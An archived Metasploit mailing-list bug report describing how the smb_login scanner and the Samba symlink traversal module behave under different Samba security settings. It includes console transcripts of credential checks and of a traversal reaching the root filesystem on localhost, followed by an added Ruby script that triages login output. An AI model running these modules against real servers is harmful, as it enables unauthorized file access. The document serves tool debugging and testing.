Metasploit mailing list archives
smb_login and "security = share"
From: Nicob <nicob () nicob net>
Date: Fri, 12 Feb 2010 00:33:21 +0100
Hello,

it seems that Metasploit (svn r8458) can't fully login to a Samba share
(and exploit the symlink vulnerability) when the Samba "security" option
is set to "share" (instead of "user"). However, the exploit based on
kingcope's modified smbclient is working fine in both situations.

[-=-] Config :

nicob is a valid user, his password is tototo
user ffffff doesn't exist

[global]
lanman auth = yes
workgroup = HOME
netbios name = HOME
security = [security or user]
encrypt passwords = yes
passdb backend = smbpasswd
smb passwd file = /etc/samba/msf_passwd
browseable = yes

[NAS]
path=/tmp/
comment = NAS Share
browseable = yes
read only = no

[-=-] if security = share :

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(smb_login) > set SMBPass tototo
SMBPass => tototo
msf auxiliary(smb_login) > set SMBUser nicob
SMBUser => nicob
msf auxiliary(smb_login) > run
[*] Starting host 127.0.0.1
[*] 127.0.0.1 - GUEST LOGIN (Unix) nicob : tototo
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf auxiliary(smb_login) > set SMBUser fffffff
SMBUser => fffffff
msf auxiliary(smb_login) > set SMBPass foo
SMBPass => foo
msf auxiliary(smb_login) > rerun
[*] Starting host 127.0.0.1
[*] 127.0.0.1 - GUEST LOGIN (Unix) ffffff : foo
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

=> only "GUEST" access is detected
=> username and password are irrelevant

msf auxiliary(samba_symlink_traversal) > rerun
[*] Connecting to the server...
[*] Trying to mount writeable share 'NAS'...
[-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_WRONG_PASSWORD (Command=117 WordCount=0)
[-] Call stack:
[-] xxx/trunk/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
[-] xxx/trunk/lib/rex/proto/smb/client.rb:951:in `tree_connect'
[-] xxx/trunk/lib/rex/proto/smb/simpleclient.rb:253:in `connect'
[-] (eval):64:in `run'
[*] Auxiliary module execution completed

=> exploit failed

[-=-] if security = user :

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(smb_login) > set SMBPass tototo
SMBPass => tototo
msf auxiliary(smb_login) > set SMBUser nicob
SMBUser => nicob
msf auxiliary(smb_login) > run
[*] Starting host 127.0.0.1
[+] 127.0.0.1 - SUCCESSFUL LOGIN (Unix) 'nicob' : 'tototo'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

=> nicob/tototo is detected as a valid login

msf auxiliary(samba_symlink_traversal) > rerun
[*] Connecting to the server...
[*] Trying to mount writeable share 'NAS'...
[*] Trying to link 'escape' to the root filesystem...
[*] Now access the following share to browse the root filesystem:
[*] \\127.0.0.1\NAS\escape\
[*] Auxiliary module execution completed

=> exploit is working

Nicob
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
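
Added example, not part of Nicob's message and not Metasploit code: a small Ruby script that triages smb_login console lines like the ones in the message above, counting a credential pair as verified only on SUCCESSFUL LOGIN and flagging a host that answers GUEST LOGIN for more than one distinct pair. The function names, verdict symbols and regular expression are assumptions made for this illustration; the sample lines are copied from the transcripts above.

```ruby
# Added illustration; not Metasploit code. Names below are hypothetical.
# Sample lines are copied from the two smb_login runs in the message above.
SHARE_RUN = <<~LOG
  [*] Starting host 127.0.0.1
  [*] 127.0.0.1 - GUEST LOGIN (Unix) nicob : tototo
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Starting host 127.0.0.1
  [*] 127.0.0.1 - GUEST LOGIN (Unix) ffffff : foo
LOG
USER_RUN = <<~LOG
  [*] Starting host 127.0.0.1
  [+] 127.0.0.1 - SUCCESSFUL LOGIN (Unix) 'nicob' : 'tototo'
LOG

# Result lines quote the credentials in one case and not in the other,
# so the quotes are optional. Assumes no "'" inside user or password.
RESULT_RE = /\A\[[*+]\]\s+(?<host>\S+)\s+-\s+(?<kind>GUEST|SUCCESSFUL)\sLOGIN
             \s+\([^)]*\)\s+'?(?<user>[^']*?)'?\s+:\s+'?(?<pass>[^']*?)'?\s*\z/x

# Return one hash per result line; banner and progress lines are skipped.
def parse_results(log)
  log.each_line.map do |line|
    m = RESULT_RE.match(line.strip)
    m && { host: m[:host], kind: m[:kind], cred: [m[:user], m[:pass]] }
  end.compact
end

# Per host: which pairs were really checked, and which only got guest access.
def triage(log)
  parse_results(log).group_by { |r| r[:host] }.transform_values do |rows|
    verified = rows.select { |r| r[:kind] == "SUCCESSFUL" }.map { |r| r[:cred] }.uniq
    guest    = rows.select { |r| r[:kind] == "GUEST" }.map { |r| r[:cred] }.uniq
    verdict =
      if !verified.empty? then :credentials_verified
      elsif guest.size > 1 then :guest_for_any_credentials # pairs are irrelevant
      else :guest_only_unverified                          # one sample, no proof
      end
    { verdict: verdict, verified: verified, guest: guest }
  end
end

if __FILE__ == $PROGRAM_NAME
  { "security = share" => SHARE_RUN, "security = user" => USER_RUN }.each do |mode, log|
    triage(log).each { |host, r| puts "#{mode}: #{host} #{r[:verdict]}" }
  end
end
```
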